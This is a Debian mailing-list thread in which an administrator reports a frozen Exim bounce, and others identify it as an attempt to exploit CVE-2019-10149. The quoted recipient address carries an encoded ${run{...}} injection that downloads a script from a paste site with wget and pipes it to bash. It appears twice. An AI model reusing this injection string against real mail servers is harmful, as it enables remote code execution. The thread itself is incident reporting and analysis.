On Tue, Oct 13, 2020 at 7:14 AM Knieling, Christian (IANM) wrote:

I don't know if this messages reaches the right persons, but someone may forward it. You may at least remove the files which are accessible on paste.debian.net.

I forwarded this to the paste.d.n admin and they removed them.

For future reference, the admin contact is listed on the left side of the site:

https://paste.debian.net/

--
bye,
pabs

https://wiki.debian.org/PaulWise

--- SoupGate-Win32 v1.05
* Origin: fsxNet Usenet Gateway (21:1/5)

Am Dienstag, den 13.10.2020, 08:51 +0200 schrieb Knieling, Christian (IANM):

To whom this may concern,

I got a system message from my mailer daemon lately. It contains

-------------------------------- cut --------------------------------
Message 1kS01n-0008Kv-Nb has been frozen (delivery error message).
The sender is <>.

The following address(es) have yet to be delivered:

${run{\x2Fbin\x2Fsh\t-c\t\x22wget\t-O\t- \thttps\x3A\x2F\x2Fpaste\x2Edebian\x2Enet\x2Fdownloadh\x2Fb8e3188e\t\x7C\tbas h\x22}}@ianm-mang.math.kit.edu:
Too many "Received" headers - suspected mail loop -------------------------------- cut --------------------------------

[..]

I don't know if this messages reaches the right persons, but someone may forward it. You may at least remove the files which are accessible on paste.debian.net.

Clearly someone tries to run a command put as an address. Out of curiosity: Which kind of vulnerability are they trying to use here?

Regards, Daniel
--
Regards,
Daniel Leidert <dleidert@debian.org> | https://www.wgdd.de/
GPG-Key RSA4096 / BEED4DED5544A4C03E283DC74BCD0567C296D05D
GPG-Key ED25519 / BD3C132D8B3805D1808123AB7ACE00941E338C78

If you like my work consider sponsoring me via https://www.patreon.com/join/dleidert

-----BEGIN PGP SIGNATURE-----

iQIzBAABCgAdFiEEvu1N7VVEpMA+KD3HS80FZ8KW0F0FAl+FsvsACgkQS80FZ8KW 0F3qYA/+NkdKL/0bGPFLAd+r+eimn4ChqZRWedWDSwjrhGRsCkmRWtrrYEEU8fUr YxQCqSU7nIXsApP8wWszlGzQZyw1/O2IhEgZmRHf2nbd+qe1u0yIJtNw8+87vdeP NgAqLcpOLJG1tB8cBGWhYsb/1tVeGLnGpOzWUvLSZtDRB1boe899OVID+vbMMgY0 m19Asoz7paGaaHjxqC6RXJ9Y/V+LrVqqx1jBnvKbiJJEndyg8BimOggYXfm8koE6 qHpV1ttQPDxeDyVrDT/qhbb4lf501V2Qtw7dpBFHRxn3UJyZiD7HABGiwd9IWhKF JqEJT8+gtWiDOcXWOhMnzbggySVzEnVXgDmrtAKLrcAfSx8He/hpHgTsoQmZlZ77 8IX2XWhDmPm8J4QWe1JM5vkgDiyDqm93BRvNXTdZBCZOdYaGQm3PzGzrsbJfZeDB 8a36QvlcYQBnFw1h6fOXaQvXQbykpr8WfjeAy4L5XX44NiIdCQVDMdbC8p+8wdif yw3FNrI2yYQ3VfdiwTbdmsikVekoV09RYbR9r7jHCvKNz7hX4cenaW6/NHIIp/PO Y+Y5/wWImS7KPoCIHnH2AtXDbkGHgdug43OCV2dJuaIE

On 13.10.20 16:00, Daniel Leidert wrote:

Clearly someone tries to run a command put as an address. Out of curiosity: Which kind of vulnerability are they trying to use here?

Probably CVE-2019-10149

https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt

Grüße,
Sven.

--- SoupGate-Win32 v1.05
* Origin: fsxNet Usenet Gateway (21:1/5)

Am 13.10.20 um 16:00 schrieb Daniel Leidert:

Am Dienstag, den 13.10.2020, 08:51 +0200 schrieb Knieling, Christian (IANM):

To whom this may concern,

I got a system message from my mailer daemon lately. It contains

-------------------------------- cut --------------------------------
Message 1kS01n-0008Kv-Nb has been frozen (delivery error message).
The sender is <>.

The following address(es) have yet to be delivered:

${run{\x2Fbin\x2Fsh\t-c\t\x22wget\t-O\t-
\thttps\x3A\x2F\x2Fpaste\x2Edebian\x2Enet\x2Fdownloadh\x2Fb8e3188e\t\x7C\tbas
h\x22}}@ianm-mang.math.kit.edu:
Too many "Received" headers - suspected mail loop
-------------------------------- cut --------------------------------

[..]

I don't know if this messages reaches the right persons, but someone may
forward it. You may at least remove the files which are accessible on
paste.debian.net.

Clearly someone tries to run a command put as an address. Out of curiosity: Which kind of vulnerability are they trying to use here?

Regards, Daniel

Hi,

I think some Exim4 exploit, see CVE-2019-10149 [1].

Cheers,
Martin

[1] https://security-tracker.debian.org/tracker/CVE-2019-10149

--- SoupGate-Win32 v1.05
* Origin: fsxNet Usenet Gateway (21:1/5)